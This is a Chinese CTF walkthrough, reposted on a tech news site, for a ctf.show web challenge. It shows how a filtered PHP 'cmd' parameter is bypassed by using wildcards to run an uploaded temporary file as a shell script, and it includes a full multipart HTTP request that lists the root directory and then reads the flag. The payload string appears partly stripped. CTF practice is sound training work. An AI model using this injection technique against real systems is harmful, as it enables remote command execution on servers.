返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >CTFshow--web--红包题第二弹
  • 713
分享到

CTFshow--web--红包题第二弹

前端htmlphp安全Poweredby金山文档 2023-09-15 20:09:07 713人浏览 安东尼
摘要

查看源代码,按注释提示,构造参数试试?cmd=aa ctf.show_红包题 ctf.show_红包题 where is the flag?

查看源代码,按注释提示,构造参数试试?cmd=aa

            ctf.show_红包题    

ctf.show_红包题

where is the flag?

源码中过滤了很多东西,可以使用的字符:p ` ? / + < > =

通过可用的字符构造cmd=?>

备注:问号?代表一个任意字符,通配符/??p/p?p??????匹配/tmp/PHPxxxxxx

构造payload

?cmd=?>

然后bp抓包,修改这几个地方,发现根目录下有flag.txt

POST /?cmd=?>Http/1.1
Host: 4947507e-e5ac-452c-8f01-80f5309742d9.challenge.ctf.show
User-Agent: Mozilla/5.0 (windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/WEBp,*/*;q=0.8
Content-Type: multipart/fORM-data; boundary=---------------------------10242300956292313528205888
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 237

-----------------------------10242300956292313528205888
Content-Disposition: form-data; name="fileUpload"; filename="1.txt"
Content-Type: text/plain

#! /bin/sh

ls /
-----------------------------10242300956292313528205888--

修改命令为cat /flag.txt 得到flag

来源地址:https://blog.csdn.net/weixin_45908624/article/details/128786662

--结束END--

本文标题: CTFshow--web--红包题第二弹

本文链接: https://lsjlt.com/news/409106.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

猜你喜欢
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作